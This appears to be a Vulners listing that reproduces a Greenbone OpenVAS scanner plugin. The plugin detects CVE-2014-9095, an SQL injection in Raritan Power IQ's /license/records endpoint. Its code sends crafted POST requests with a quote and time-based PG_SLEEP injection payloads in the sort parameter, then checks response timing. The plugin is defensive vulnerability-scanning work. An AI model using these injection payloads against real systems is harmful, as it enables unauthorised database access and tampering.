Lucene search
+L

Raritan Power IQ SQL Injection Vulnerability

🗓️ 15 Aug 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 11 Views

Raritan Power IQ SQL Injection Vulnerability. Remote attacker can inject SQL queries to the /license/records script using sort or dir parameter to view, add, modify or delete back-end database info

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-9095
26 Nov 201415:00
cve
Cvelist
CVE-2014-9095
26 Nov 201415:00
cvelist
Exploit DB
Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)
21 Jul 201400:00
exploitdb
EUVD
EUVD-2014-8921
7 Oct 202500:30
euvd
NVD
CVE-2014-9095
26 Nov 201415:59
nvd
Prion
Sql injection
26 Nov 201415:59
prion
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:raritan:power_iq";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105922");
  script_version("2023-07-26T05:05:09+0000");
  script_tag(name:"last_modification", value:"2023-07-26 05:05:09 +0000 (Wed, 26 Jul 2023)");
  script_tag(name:"creation_date", value:"2014-08-15 16:50:19 +0700 (Fri, 15 Aug 2014)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_tag(name:"solution_type", value:"VendorFix");

  script_cve_id("CVE-2014-9095");

  script_name("Raritan Power IQ SQL Injection Vulnerability");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_raritan_poweriq_detect.nasl");
  script_mandatory_keys("raritan_poweriq/detected");
  script_require_ports("Services/www", 443);

  script_tag(name:"summary", value:"Raritan Power IQ SQL Injection Vulnerability");

  script_tag(name:"vuldetect", value:"Tries to execute a time-based blind
  SQL injection and checks the response time.");

  script_tag(name:"insight", value:"Raritan PowerIQ is vulnerable to SQL injection.
  A remote attacker could send specially-crafted SQL statements to the /license/records
  script using the sort or dir parameter, which could allow the attacker to view, add,
  modify or delete information in the back-end database.");

  script_tag(name:"impact", value:"Successful exploitation will allow attacker to
  inject or manipulate SQL queries in the back-end database, allowing for the manipulation
  or disclosure of arbitrary data.");

  script_tag(name:"affected", value:"Raritan Power IQ 4.2.2, 4.1.3 and below.");

  script_tag(name:"solution", value:"Install the patch from Raritan found in the references.");

  script_xref(name:"URL", value:"https://www.raritan.com/support/product/poweriq/security-patches");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/68722");
  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2014/Jul/79");
  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/94717");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe: CPE))
  exit(0);

if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
  exit(0);

url = "/license/records";
data = "sort=id&dir=ASC";
useragent = http_get_user_agent();

host = http_host_name(port:port);

req = string('POST ', url, ' HTTP/1.1\r\n',
             'Host: ', host, '\r\n',
             'User-Agent: ', useragent, '\r\n',
             'Content-Type: application/x-www-form-urlencoded\r\n',
             'Content-Length: ', strlen(data), '\r\n',
             'X-Requested-With: XMLHttpRequest\r\n',
             '\r\n',
             data);
start = unixtime();
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
stop = unixtime();

if (res !~ "^HTTP/1\.[01] 200" || '"rows":' >!< res) {
  exit(0);
}

data = "sort=id'&dir=ASC";
req = string('POST ', url, ' HTTP/1.1\r\n',
             'Host: ', host, '\r\n',
             'User-Agent: ', useragent, '\r\n',
             'Content-Type: application/x-www-form-urlencoded\r\n',
             'Content-Length: ', strlen(data), '\r\n',
             'X-Requested-With: XMLHttpRequest\r\n',
             '\r\n',
             data);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

if (res !~ "^HTTP/1\.[01] 500")
  exit(0);

# Execute time based check
latency = stop - start;

temp = 0;

foreach i (make_list(1, 3)) {
  data = "sort=(SELECT 5480 FROM PG_SLEEP(" + i + "))&dir=ASC";
  req =  string('POST ', url, ' HTTP/1.1\r\n',
                'Host: ', host, '\r\n',
                'User-Agent: ', useragent, '\r\n',
                'Content-Type: application/x-www-form-urlencoded\r\n',
                'Content-Length: ', strlen(data), '\r\n',
                'X-Requested-With: XMLHttpRequest\r\n',
                '\r\n',
                data);

  start = unixtime();
  res = http_keepalive_send_recv(port:port, data:req);
  stop = unixtime();

  if (stop - start < i || stop - start > (i+5+latency))
    exit(0);
  else
   temp += 1;
}

if (temp == 2) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit( 0 );
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Jul 2023 00:00Current
7.9High risk
Vulners AI Score7.9
CVSS 27.5
EPSS0.02348
11